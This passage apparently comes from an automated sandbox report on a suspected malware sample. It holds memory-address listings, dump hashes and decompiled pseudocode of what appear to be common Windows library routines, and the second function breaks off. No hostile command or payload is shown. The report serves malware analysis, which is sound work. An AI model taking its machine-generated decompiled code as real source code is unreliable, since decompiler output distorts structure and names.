                                                                                                                              0x00000000
                                                                                                                              0x1d753ad7
                                                                                                                              0x1d753af1
                                                                                                                              0x1d753ae3
                                                                                                                              0x1d753ae3
                                                                                                                              0x00000000
                                                                                                                              0x1d753ae3
                                                                                                                              0x1d753986
                                                                                                                              0x1d753986
                                                                                                                              0x1d753986
                                                                                                                              0x1d753989
                                                                                                                              0x1d753990
                                                                                                                              0x1d753990
                                                                                                                              0x1d753992
                                                                                                                              0x1d753995
                                                                                                                              0x1d753998
                                                                                                                              0x1d75399b
                                                                                                                              0x1d7539a0
                                                                                                                              0x1d7539a0
                                                                                                                              0x1d7539ab
                                                                                                                              0x1d7539b3
                                                                                                                              0x1d7539bd
                                                                                                                              0x1d7539bd
                                                                                                                              0x1d7539c7
                                                                                                                              0x1d7539ca
                                                                                                                              0x1d7539cc
                                                                                                                              0x1d7539d2
                                                                                                                              0x1d7539f0
                                                                                                                              0x1d7539f3
                                                                                                                              0x1d7539fa
                                                                                                                              0x1d753a00
                                                                                                                              0x1d753a03
                                                                                                                              0x1d753a06
                                                                                                                              0x1d753a0f
                                                                                                                              0x1d753a19
                                                                                                                              0x1d753a24
                                                                                                                              0x1d753a8f
                                                                                                                              0x1d753a95
                                                                                                                              0x1d753a9a
                                                                                                                              0x1d7a6976
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d7a6985
                                                                                                                              0x1d753aa5
                                                                                                                              0x1d753aa8
                                                                                                                              0x1d7a698f
                                                                                                                              0x1d7a699c
                                                                                                                              0x1d7a69bd
                                                                                                                              0x1d7a69bd
                                                                                                                              0x1d7a699c
                                                                                                                              0x1d753aae
                                                                                                                              0x1d753ab4
                                                                                                                              0x1d753ab4
                                                                                                                              0x1d753aa0
                                                                                                                              0x1d753aa0
                                                                                                                              0x00000000
                                                                                                                              0x1d753aa0
                                                                                                                              0x1d753a3a
                                                                                                                              0x1d753a3d
                                                                                                                              0x1d753a40
                                                                                                                              0x1d7a6884
                                                                                                                              0x1d7a6886
                                                                                                                              0x1d7a6888
                                                                                                                              0x1d7a688d
                                                                                                                              0x1d7a688f
                                                                                                                              0x1d7a6898
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d7a689e
                                                                                                                              0x1d7a68a4
                                                                                                                              0x1d7a68ad
                                                                                                                              0x1d7a68be
                                                                                                                              0x1d7a68cd
                                                                                                                              0x1d7a68cd
                                                                                                                              0x1d7a68cf
                                                                                                                              0x1d7a68d5
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d7a68d7
                                                                                                                              0x1d7a68d7
                                                                                                                              0x1d7a68db
                                                                                                                              0x1d7a68e6
                                                                                                                              0x1d7a68ee
                                                                                                                              0x1d7a68f0
                                                                                                                              0x1d7a68f0
                                                                                                                              0x00000000
                                                                                                                              0x1d7a68f0
                                                                                                                              0x1d7a68b8
                                                                                                                              0x00000000
                                                                                                                              0x1d7a68b8
                                                                                                                              0x1d753a46
                                                                                                                              0x1d753a57
                                                                                                                              0x1d753a59
                                                                                                                              0x1d753a5c
                                                                                                                              0x1d7a68fa
                                                                                                                              0x1d7a68fc
                                                                                                                              0x1d7a68fe
                                                                                                                              0x1d7a6903
                                                                                                                              0x1d7a6905
                                                                                                                              0x1d7a690e
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d7a6914
                                                                                                                              0x1d7a691a
                                                                                                                              0x1d7a6923
                                                                                                                              0x1d7a6939
                                                                                                                              0x1d7a6943
                                                                                                                              0x1d7a6943
                                                                                                                              0x1d7a6945
                                                                                                                              0x1d7a694b
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d7a694d
                                                                                                                              0x1d7a694d
                                                                                                                              0x1d7a6951
                                                                                                                              0x1d7a6959
                                                                                                                              0x1d7a695f
                                                                                                                              0x1d7a6967
                                                                                                                              0x1d7a6969
                                                                                                                              0x1d7a6969
                                                                                                                              0x00000000
                                                                                                                              0x1d7a6969
                                                                                                                              0x1d7a692e
                                                                                                                              0x00000000
                                                                                                                              0x1d7a692e
                                                                                                                              0x1d753a62
                                                                                                                              0x1d753a67
                                                                                                                              0x1d753a6c
                                                                                                                              0x1d753a7e
                                                                                                                              0x1d753a81
                                                                                                                              0x1d753a88
                                                                                                                              0x00000000
                                                                                                                              0x1d753a88
                                                                                                                              0x1d75388e
                                                                                                                              0x1d753898
                                                                                                                              0x1d75389b
                                                                                                                              0x1d7538a0
                                                                                                                              0x1d7538ad
                                                                                                                              0x1d7538b0
                                                                                                                              0x1d7538b3
                                                                                                                              0x1d7538b4
                                                                                                                              0x1d7538b7
                                                                                                                              0x1d7538c7
                                                                                                                              0x1d7538ca
                                                                                                                              0x1d7538d3
                                                                                                                              0x1d7538d7
                                                                                                                              0x1d7538d9
                                                                                                                              0x1d7538dc
                                                                                                                              0x1d7538df
                                                                                                                              0x1d7538e3
                                                                                                                              0x00000000
                                                                                                                              0x1d7538e3
                                                                                                                              0x1d75388c

                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000007.00000002.42268320726.000000001D710000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D710000, based on PE: true
                                                                                                                              • Associated: 00000007.00000002.42269843013.000000001D839000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000007.00000002.42269890824.000000001D83D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_7_2_1d710000_aSsc9zh1ex.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 375a01751955ca6436330d2bf5297fcf9a74b7c6ed4a59d1534b8da53c4b6a83
                                                                                                                              • Instruction ID: b42197ded4e2b4586d53f45ab310d079ca6870afa5aebb53bbfca17d1c2fc36a
                                                                                                                              • Opcode Fuzzy Hash: 375a01751955ca6436330d2bf5297fcf9a74b7c6ed4a59d1534b8da53c4b6a83
                                                                                                                              • Instruction Fuzzy Hash: ABE19175A00256DFDB08CF58C880AAEB7F5FF88320F258559E555EB3A1D730E941CBA2
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 1D74D700 Relevance: .3, Instructions: 342COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 87%
                                                                                                                              			E1D74D700(signed int __ecx, signed int __edx) {
				intOrPtr _v8;
				signed int _v13;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				char _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				void* __ebp;
				signed int _t114;
				signed int _t115;
				signed int _t118;
				signed char _t121;
				signed int _t123;
				signed int _t125;
				signed int _t127;
				signed int _t128;
				signed int _t131;
				signed int _t136;
				signed int _t142;
				intOrPtr _t145;
				signed char _t146;
				signed int _t147;
				signed int _t149;
				signed int _t150;
				signed char _t151;
				signed int _t154;
				signed int* _t160;
				signed int _t165;
				signed int _t168;
				signed int _t171;
				signed int _t172;
				signed int _t175;
				signed char _t179;
				intOrPtr _t180;
				signed int _t182;
				signed int _t191;
				signed int _t192;
				signed int _t198;
				signed int* _t201;
				signed int _t203;
				void* _t206;
				signed int _t208;
				signed int _t213;
				void* _t218;

				_t190 = __edx;
				_v8 =  *((intOrPtr*)(_t218 + 4));
				_t201 = __edx;
				_v32 = 0;
				_t208 = __ecx;
				_v20 = __edx;
				_v24 = __ecx;
				 *((intOrPtr*)(__edx + 4)) = 0;
				 *((intOrPtr*)(__edx + 8)) = 0;
				if( *0x1d8365f4 != 3) {
					L14:
					_push(0);
					_push(0xc);
					_push( &_v60);
					_push(6);
					_push(_t208);
					_push(0xffffffff);
					_t114 = E1D782BE0();
					__eflags = _t114;
					if(_t114 < 0) {
						L69:
						_t168 = 0;
						_v24 = 0;
						L19:
						_t201[1] = _t168;
						__eflags = _t168;
						if(_t168 == 0) {
							_t191 = _v32;
							L41:
							_t115 = _t191;
							L13:
							return _t115;
						}
						_v28 = 0;
						E1D74E580(1, _t168, 0, 0,  &_v28);
						_t118 = _v28;
						__eflags =  *(_t118 + 0x5e) & 0x00000400;
						if(( *(_t118 + 0x5e) & 0x00000400) != 0) {
							L48:
							_t192 = _t190 | 0xffffffff;
							_t115 = _t192;
							_t201[3] = _t208 | _t192;
							 *_t201 = _t192;
							goto L13;
						}
						E1D74E580(1, _v24, 0, 0,  &_v48);
						_t121 = _v24;
						_t208 = 0;
						_v13 = 1;
						_t171 = _t121;
						_v20 = _t171;
						_v36 = 0;
						_v40 = 0;
						__eflags = _t121 & 0x00000003;
						if((_t121 & 0x00000003) != 0) {
							_t171 = _t171 & 0xfffffffc;
							_t142 =  !_t121 & 0x00000001;
							__eflags = _t142;
							_v20 = _t171;
							_v13 = _t142;
						}
						_t123 = E1D74E580(1, _t171, 0, 0,  &_v36);
						_t172 = _v36;
						__eflags = _t172;
						if(_t172 == 0) {
							L77:
							__eflags = _t123;
							if(__eflags < 0) {
								goto L72;
							}
							goto L78;
						} else {
							_t136 =  *(_t172 + 0x18) & 0x0000ffff;
							_t190 = 0x10b;
							__eflags = _t136 - 0x10b;
							if(_t136 != 0x10b) {
								_t190 = 0x20b;
								__eflags = _t136 - 0x20b;
								if(__eflags != 0) {
									L72:
									_t125 = E1D74DE20(_v24, __eflags, _v24, 1, 0xe,  &_v20);
									__eflags = _t125;
									if(_t125 == 0) {
										L74:
										_t191 = 0;
										L40:
										_t201[3] = 0;
										 *_t201 = _t191;
										goto L41;
									}
									__eflags =  *(_t125 + 0x10) & 0x00000001;
									if(( *(_t125 + 0x10) & 0x00000001) != 0) {
										goto L48;
									}
									goto L74;
								}
								_t190 = _v13;
								_t123 = E1D737386(_v20, _t190, 0xa,  &_v44, _t172,  &_v40);
								_t208 = _v40;
								goto L77;
							}
							__eflags =  *((intOrPtr*)(_t172 + 0x74)) - 0xa;
							if(__eflags <= 0) {
								goto L72;
							}
							_t208 =  *(_t172 + 0xc8);
							__eflags = _t208;
							if(__eflags == 0) {
								goto L72;
							}
							__eflags = _v13;
							_t190 =  *(_t172 + 0xcc);
							_v44 = _t190;
							if(_v13 == 0) {
								__eflags = _t208 -  *((intOrPtr*)(_t172 + 0x54));
								if(_t208 <  *((intOrPtr*)(_t172 + 0x54))) {
									goto L28;
								}
								_t208 = E1D749630(_t172, _v20, _t208);
								__eflags = _t208;
								if(__eflags != 0) {
									L78:
									_t190 = _v44;
									L29:
									__eflags = _t208;
									if(__eflags == 0) {
										goto L72;
									}
									__eflags = _t190;
									if(__eflags == 0) {
										goto L72;
									}
									__eflags = _t190 - 0x40;
									if(_t190 == 0x40) {
										L33:
										_t127 =  *(_v48 + 4) & 0x0000ffff;
										__eflags = _t127 - 0x3a64;
										if(_t127 == 0x3a64) {
											L35:
											__eflags =  *_t208 - 0x48;
											if(__eflags < 0) {
												goto L72;
											}
											_t190 =  *(_t208 + 0x40);
											__eflags = _t190;
											if(__eflags == 0) {
												goto L72;
											}
											_t208 =  *(_t208 + 0x44);
											__eflags = _t208;
											if(__eflags == 0) {
												goto L72;
											}
											_t128 = _v28;
											_t175 = _v24;
											__eflags = _t190 -  *((intOrPtr*)(_t128 + 0x54)) + _t175;
											if(_t190 <  *((intOrPtr*)(_t128 + 0x54)) + _t175) {
												goto L48;
											}
											_t131 = _v28;
											__eflags = _t208 -  *((intOrPtr*)(_t131 + 0x50)) - _t190 + _t175 >> 2;
											if(_t208 >  *((intOrPtr*)(_t131 + 0x50)) - _t190 + _t175 >> 2) {
												goto L48;
											}
											goto L40;
										}
										__eflags = _t127 - 0x14c;
										if(__eflags != 0) {
											goto L72;
										}
										goto L35;
									}
									__eflags = _t190 -  *_t208;
									if(__eflags != 0) {
										goto L72;
									}
									goto L33;
								}
								goto L72;
							}
							L28:
							_t208 = _t208 + _v20;
							__eflags = _t208;
							goto L29;
						}
					}
					_t168 = _v60;
					_v24 = _t168;
					__eflags = _t168;
					if(_t168 == 0) {
						goto L69;
					}
					__eflags = _v52 & 0x00000003;
					if((_v52 & 0x00000003) != 0) {
						goto L69;
					}
					__eflags = _t208 - _t168;
					if(_t208 < _t168) {
						goto L69;
					}
					_t201[2] = _v56;
					goto L19;
				}
				L1D7453C0(0x1d83681c);
				_t145 =  *0x1d839360; // 0x31
				if(_t145 == 1) {
					L11:
					_t190 = 0x1d83681c;
					_t146 = 0x11;
					asm("lock cmpxchg [edx], ecx");
					_t179 = 0x11;
					if(0x11 != 0x11) {
						__eflags = 1;
						if(1 == 0) {
							_t146 = E1D798AA0(0x11, 0x1d83681c, 0xc0000264);
							L55:
							__eflags = _t179 & 0x00000008;
							if((_t179 & 0x00000008) == 0) {
								_t147 = _t146 | 0xffffffff;
								__eflags = _t147;
								_v28 = _t147;
								L61:
								_t203 = _v28;
								while(1) {
									_t149 = _t179 & 0x00000006;
									_v40 = _t149;
									__eflags = _t149 - 2;
									_t150 = _t203 + 4;
									if(_t149 != 2) {
										_t150 = _t203;
									}
									_t190 = _t179 + _t150;
									_t151 = _t179;
									asm("lock cmpxchg [edi], esi");
									_t203 = _v28;
									__eflags = _t151 - _t179;
									if(_t151 == _t179) {
										break;
									}
									_t179 = _t151;
								}
								__eflags = _v40 - 2;
								_t201 = _v20;
								if(_v40 == 2) {
									_t190 = 0;
									__eflags = 0;
									E1D773BDB(0x1d83681c, 0, 0);
								}
								_t208 = _v24;
								goto L12;
							}
							_t154 = _t179 & 0xfffffff0;
							_t190 =  *(_t154 + 4);
							__eflags = _t190;
							if(_t190 != 0) {
								L58:
								asm("lock xadd [edx+0x10], eax");
								__eflags = (_t154 | 0xffffffff) - 1;
								if((_t154 | 0xffffffff) - 1 > 0) {
									goto L12;
								}
								_v28 = 0xfffffff7;
								goto L61;
							} else {
								goto L57;
							}
							do {
								L57:
								_t154 =  *_t154;
								_t190 =  *(_t154 + 4);
								__eflags = _t190;
							} while (_t190 == 0);
							goto L58;
						}
						__eflags = 0;
						if(0 != 0) {
							goto L55;
						}
						while(1) {
							_t75 = _t179 - 0x10; // 0x1
							asm("sbb edx, edx");
							_t190 =  ~((_t179 & 0xfffffff0) - 0x10) & _t75;
							_t146 = _t179;
							asm("lock cmpxchg [edi], edx");
							_t201 = _v20;
							__eflags = _t146 - _t179;
							if(_t146 == _t179) {
								goto L12;
							}
							_t179 = _t146;
							__eflags = _t146 & 0x00000002;
							if((_t146 & 0x00000002) == 0) {
								continue;
							}
							goto L55;
						}
					}
					L12:
					_t115 = _v32;
					if(_t115 == 0) {
						__eflags =  *0x1d83936c;
						if( *0x1d83936c != 0) {
							goto L14;
						}
						_t180 =  *[fs:0x30];
						__eflags =  *(_t180 + 0x28) & 0x00000080;
						if(( *(_t180 + 0x28) & 0x00000080) == 0) {
							goto L13;
						}
						goto L14;
					}
					goto L13;
				}
				_t182 = 1;
				_t8 = _t145 - 1; // 0x30
				_t206 = _t8;
				if(_t206 < 1) {
					L53:
					_t201 = _v20;
					goto L11;
				} else {
					goto L3;
				}
				do {
					L3:
					_t198 = _t182 + _t206 >> 1;
					_t160 = (_t198 << 4) + 0x1d839370;
					_t213 = _t160[1];
					if(_v24 < _t213) {
						_t208 = _v24;
						__eflags = _t198;
						if(_t198 == 0) {
							goto L53;
						}
						_t206 = _t198 - 1;
						goto L6;
					}
					_t208 = _v24;
					if(_t208 < _t160[2] + _t213) {
						_t201 = _v20;
						 *_t201 =  *_t160;
						_t201[1] = _t160[1];
						_t201[2] = _t160[2];
						_t201[3] = _t160[3];
						asm("ror eax, cl");
						_t165 =  *_t201 ^  *0x7ffe0330;
						__eflags = _t165;
						_v32 = _t165;
						 *_t201 = _t165;
						goto L11;
					}
					_t182 = _t198 + 1;
					L6:
				} while (_t206 >= _t182);
				goto L53;
			}





















































                                                                                                                              0x1d74d700
                                                                                                                              0x1d74d712
                                                                                                                              0x1d74d724
                                                                                                                              0x1d74d726
                                                                                                                              0x1d74d72d
                                                                                                                              0x1d74d72f
                                                                                                                              0x1d74d732
                                                                                                                              0x1d74d735
                                                                                                                              0x1d74d73c
                                                                                                                              0x1d74d743
                                                                                                                              0x1d74d815
                                                                                                                              0x1d74d815
                                                                                                                              0x1d74d817
                                                                                                                              0x1d74d81c
                                                                                                                              0x1d74d81d
                                                                                                                              0x1d74d81f
                                                                                                                              0x1d74d820
                                                                                                                              0x1d74d822
                                                                                                                              0x1d74d827
                                                                                                                              0x1d74d829
                                                                                                                              0x1d7a3f8a
                                                                                                                              0x1d7a3f8a
                                                                                                                              0x1d7a3f8c
                                                                                                                              0x1d74d855
                                                                                                                              0x1d74d855
                                                                                                                              0x1d74d858
                                                                                                                              0x1d74d85a
                                                                                                                              0x1d74da26
                                                                                                                              0x1d74d9a0
                                                                                                                              0x1d74d9a0
                                                                                                                              0x1d74d80c
                                                                                                                              0x1d74d814
                                                                                                                              0x1d74d814
                                                                                                                              0x1d74d863
                                                                                                                              0x1d74d872
                                                                                                                              0x1d74d877
                                                                                                                              0x1d74d87f
                                                                                                                              0x1d74d883
                                                                                                                              0x1d74d9f2
                                                                                                                              0x1d74d9f2
                                                                                                                              0x1d74d9f7
                                                                                                                              0x1d74d9f9
                                                                                                                              0x1d74d9fc
                                                                                                                              0x00000000
                                                                                                                              0x1d74d9fc
                                                                                                                              0x1d74d897
                                                                                                                              0x1d74d89c
                                                                                                                              0x1d74d89f
                                                                                                                              0x1d74d8a1
                                                                                                                              0x1d74d8a5
                                                                                                                              0x1d74d8a7
                                                                                                                              0x1d74d8aa
                                                                                                                              0x1d74d8b1
                                                                                                                              0x1d74d8b4
                                                                                                                              0x1d74d8b6
                                                                                                                              0x1d74d8b8
                                                                                                                              0x1d74d8bd
                                                                                                                              0x1d74d8bd
                                                                                                                              0x1d74d8bf
                                                                                                                              0x1d74d8c2
                                                                                                                              0x1d74d8c2
                                                                                                                              0x1d74d8d0
                                                                                                                              0x1d74d8d5
                                                                                                                              0x1d74d8d8
                                                                                                                              0x1d74d8da
                                                                                                                              0x1d7a3ff9
                                                                                                                              0x1d7a3ff9
                                                                                                                              0x1d7a3ffb
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d74d8e0
                                                                                                                              0x1d74d8e0
                                                                                                                              0x1d74d8e4
                                                                                                                              0x1d74d8e9
                                                                                                                              0x1d74d8ec
                                                                                                                              0x1d7a3fd6
                                                                                                                              0x1d7a3fdb
                                                                                                                              0x1d7a3fde
                                                                                                                              0x1d7a3fae
                                                                                                                              0x1d7a3fba
                                                                                                                              0x1d7a3fbf
                                                                                                                              0x1d7a3fc1
                                                                                                                              0x1d7a3fcd
                                                                                                                              0x1d7a3fcd
                                                                                                                              0x1d74d99b
                                                                                                                              0x1d74d99b
                                                                                                                              0x1d74d99e
                                                                                                                              0x00000000
                                                                                                                              0x1d74d99e
                                                                                                                              0x1d7a3fc3
                                                                                                                              0x1d7a3fc7
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d7a3fc7
                                                                                                                              0x1d7a3fe0
                                                                                                                              0x1d7a3ff1
                                                                                                                              0x1d7a3ff6
                                                                                                                              0x00000000
                                                                                                                              0x1d7a3ff6
                                                                                                                              0x1d74d8f2
                                                                                                                              0x1d74d8f6
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d74d8fc
                                                                                                                              0x1d74d902
                                                                                                                              0x1d74d904
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d74d90a
                                                                                                                              0x1d74d90e
                                                                                                                              0x1d74d914
                                                                                                                              0x1d74d917
                                                                                                                              0x1d7a3f94
                                                                                                                              0x1d7a3f97
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d7a3fa8
                                                                                                                              0x1d7a3faa
                                                                                                                              0x1d7a3fac
                                                                                                                              0x1d7a3ffd
                                                                                                                              0x1d7a3ffd
                                                                                                                              0x1d74d920
                                                                                                                              0x1d74d920
                                                                                                                              0x1d74d922
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d74d928
                                                                                                                              0x1d74d92a
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d74d930
                                                                                                                              0x1d74d933
                                                                                                                              0x1d74d93d
                                                                                                                              0x1d74d945
                                                                                                                              0x1d74d949
                                                                                                                              0x1d74d94c
                                                                                                                              0x1d74d95c
                                                                                                                              0x1d74d95c
                                                                                                                              0x1d74d95f
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d74d965
                                                                                                                              0x1d74d968
                                                                                                                              0x1d74d96a
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d74d970
                                                                                                                              0x1d74d973
                                                                                                                              0x1d74d975
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d74d97b
                                                                                                                              0x1d74d97e
                                                                                                                              0x1d74d986
                                                                                                                              0x1d74d988
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d74d98a
                                                                                                                              0x1d74d997
                                                                                                                              0x1d74d999
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d74d999
                                                                                                                              0x1d74d953
                                                                                                                              0x1d74d956
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d74d956
                                                                                                                              0x1d74d935
                                                                                                                              0x1d74d937
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d74d937
                                                                                                                              0x00000000
                                                                                                                              0x1d7a3fac
                                                                                                                              0x1d74d91d
                                                                                                                              0x1d74d91d
                                                                                                                              0x1d74d91d
                                                                                                                              0x00000000
                                                                                                                              0x1d74d91d
                                                                                                                              0x1d74d8da
                                                                                                                              0x1d74d82f
                                                                                                                              0x1d74d832
                                                                                                                              0x1d74d835
                                                                                                                              0x1d74d837
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d74d83d
                                                                                                                              0x1d74d841
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d74d847
                                                                                                                              0x1d74d849
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d74d852
                                                                                                                              0x00000000
                                                                                                                              0x1d74d852
                                                                                                                              0x1d74d74e
                                                                                                                              0x1d74d753
                                                                                                                              0x1d74d75b
                                                                                                                              0x1d74d7e6
                                                                                                                              0x1d74d7e8
                                                                                                                              0x1d74d7ed
                                                                                                                              0x1d74d7f2
                                                                                                                              0x1d74d7f6
                                                                                                                              0x1d74d7fb
                                                                                                                              0x1d74d9a7
                                                                                                                              0x1d74d9aa
                                                                                                                              0x1d7a3efd
                                                                                                                              0x1d7a3f02
                                                                                                                              0x1d7a3f02
                                                                                                                              0x1d7a3f05
                                                                                                                              0x1d7a3f36
                                                                                                                              0x1d7a3f36
                                                                                                                              0x1d7a3f39
                                                                                                                              0x1d7a3f3c
                                                                                                                              0x1d7a3f3c
                                                                                                                              0x1d7a3f3f
                                                                                                                              0x1d7a3f41
                                                                                                                              0x1d7a3f44
                                                                                                                              0x1d7a3f47
                                                                                                                              0x1d7a3f4a
                                                                                                                              0x1d7a3f4d
                                                                                                                              0x1d7a3f4f
                                                                                                                              0x1d7a3f4f
                                                                                                                              0x1d7a3f51
                                                                                                                              0x1d7a3f5b
                                                                                                                              0x1d7a3f5d
                                                                                                                              0x1d7a3f61
                                                                                                                              0x1d7a3f64
                                                                                                                              0x1d7a3f66
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d7a3f68
                                                                                                                              0x1d7a3f68
                                                                                                                              0x1d7a3f6c
                                                                                                                              0x1d7a3f70
                                                                                                                              0x1d7a3f73
                                                                                                                              0x1d7a3f76
                                                                                                                              0x1d7a3f76
                                                                                                                              0x1d7a3f7d
                                                                                                                              0x1d7a3f7d
                                                                                                                              0x1d7a3f82
                                                                                                                              0x00000000
                                                                                                                              0x1d7a3f82
                                                                                                                              0x1d7a3f09
                                                                                                                              0x1d7a3f0c
                                                                                                                              0x1d7a3f0f
                                                                                                                              0x1d7a3f11
                                                                                                                              0x1d7a3f1c
                                                                                                                              0x1d7a3f1f
                                                                                                                              0x1d7a3f25
                                                                                                                              0x1d7a3f27
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d7a3f2d
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d7a3f13
                                                                                                                              0x1d7a3f13
                                                                                                                              0x1d7a3f13
                                                                                                                              0x1d7a3f15
                                                                                                                              0x1d7a3f18
                                                                                                                              0x1d7a3f18
                                                                                                                              0x00000000
                                                                                                                              0x1d7a3f13
                                                                                                                              0x1d74d9b0
                                                                                                                              0x1d74d9b3
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d74d9c0
                                                                                                                              0x1d74d9c2
                                                                                                                              0x1d74d9d2
                                                                                                                              0x1d74d9d4
                                                                                                                              0x1d74d9d6
                                                                                                                              0x1d74d9d8
                                                                                                                              0x1d74d9dc
                                                                                                                              0x1d74d9df
                                                                                                                              0x1d74d9e1
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d74d9e7
                                                                                                                              0x1d74d9e9
                                                                                                                              0x1d74d9eb
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d74d9ed
                                                                                                                              0x1d74d9c0
                                                                                                                              0x1d74d801
                                                                                                                              0x1d74d801
                                                                                                                              0x1d74d806
                                                                                                                              0x1d74da03
                                                                                                                              0x1d74da0a
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d74da10
                                                                                                                              0x1d74da17
                                                                                                                              0x1d74da1b
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d74da21
                                                                                                                              0x00000000
                                                                                                                              0x1d74d806
                                                                                                                              0x1d74d761
                                                                                                                              0x1d74d766
                                                                                                                              0x1d74d766
                                                                                                                              0x1d74d76b
                                                                                                                              0x1d7a3ef0
                                                                                                                              0x1d7a3ef0
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d74d771
                                                                                                                              0x1d74d771
                                                                                                                              0x1d74d774
                                                                                                                              0x1d74d77b
                                                                                                                              0x1d74d780
                                                                                                                              0x1d74d786
                                                                                                                              0x1d74d7a0
                                                                                                                              0x1d74d7a3
                                                                                                                              0x1d74d7a5
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d74d7ab
                                                                                                                              0x00000000
                                                                                                                              0x1d74d7ab
                                                                                                                              0x1d74d78d
                                                                                                                              0x1d74d792
                                                                                                                              0x1d74d7b2
                                                                                                                              0x1d74d7b5
                                                                                                                              0x1d74d7ba
                                                                                                                              0x1d74d7c0
                                                                                                                              0x1d74d7cb
                                                                                                                              0x1d74d7dd
                                                                                                                              0x1d74d7df
                                                                                                                              0x1d74d7df
                                                                                                                              0x1d74d7e1
                                                                                                                              0x1d74d7e4
                                                                                                                              0x00000000
                                                                                                                              0x1d74d7e4
                                                                                                                              0x1d74d794
                                                                                                                              0x1d74d797
                                                                                                                              0x1d74d797
                                                                                                                              0x00000000

                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000007.00000002.42268320726.000000001D710000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D710000, based on PE: true
                                                                                                                              • Associated: 00000007.00000002.42269843013.000000001D839000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000007.00000002.42269890824.000000001D83D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_7_2_1d710000_aSsc9zh1ex.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 554482b51a5edbdda5acfdf24d3d67e49bcd7c26a407b91c3d8226790bd5e9e5
                                                                                                                              • Instruction ID: 4a70a73bb46408a4c2e009f0d8b16a45bf026fd524af5bf2504ce31305e04180
                                                                                                                              • Opcode Fuzzy Hash: 554482b51a5edbdda5acfdf24d3d67e49bcd7c26a407b91c3d8226790bd5e9e5
                                                                                                                              • Instruction Fuzzy Hash: 4EC1E631E102169FDB19CF98C841BADB7B5FF44724F29C25AE965EB280D770E941CB82
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 1D7C7EC3 Relevance: .3, Instructions: 322COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 100%
                                                                                                                              			E1D7C7EC3(void* __ecx, signed int __edx, intOrPtr _a4, char _a8) {
				char _v8;
				signed short* _v12;
				signed short* _v16;
				signed int _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v32;
				intOrPtr _t125;
				signed short* _t180;
				intOrPtr _t194;
				intOrPtr* _t198;
				char _t200;
				char _t205;
				signed int _t207;
				signed int _t215;
				signed int _t218;
				signed int* _t221;
				void* _t225;
				signed int _t226;
				signed int _t230;
				signed short* _t249;
				signed short* _t254;
				char _t259;
				void* _t260;
				signed short* _t261;

				_t195 = __ecx;
				_t260 = __ecx;
				_v20 = __edx;
